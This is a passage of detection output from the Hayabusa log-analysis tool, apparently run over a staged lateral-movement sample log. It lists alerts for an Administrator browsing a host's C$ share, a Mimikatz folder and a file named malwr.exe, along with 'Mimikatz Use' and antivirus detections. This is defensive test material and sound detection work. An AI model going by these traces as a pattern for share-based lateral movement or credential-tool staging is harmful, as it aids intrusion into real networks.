Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user02\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.629 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.639 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.649 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Saved Games : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user03\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.659 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.669 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 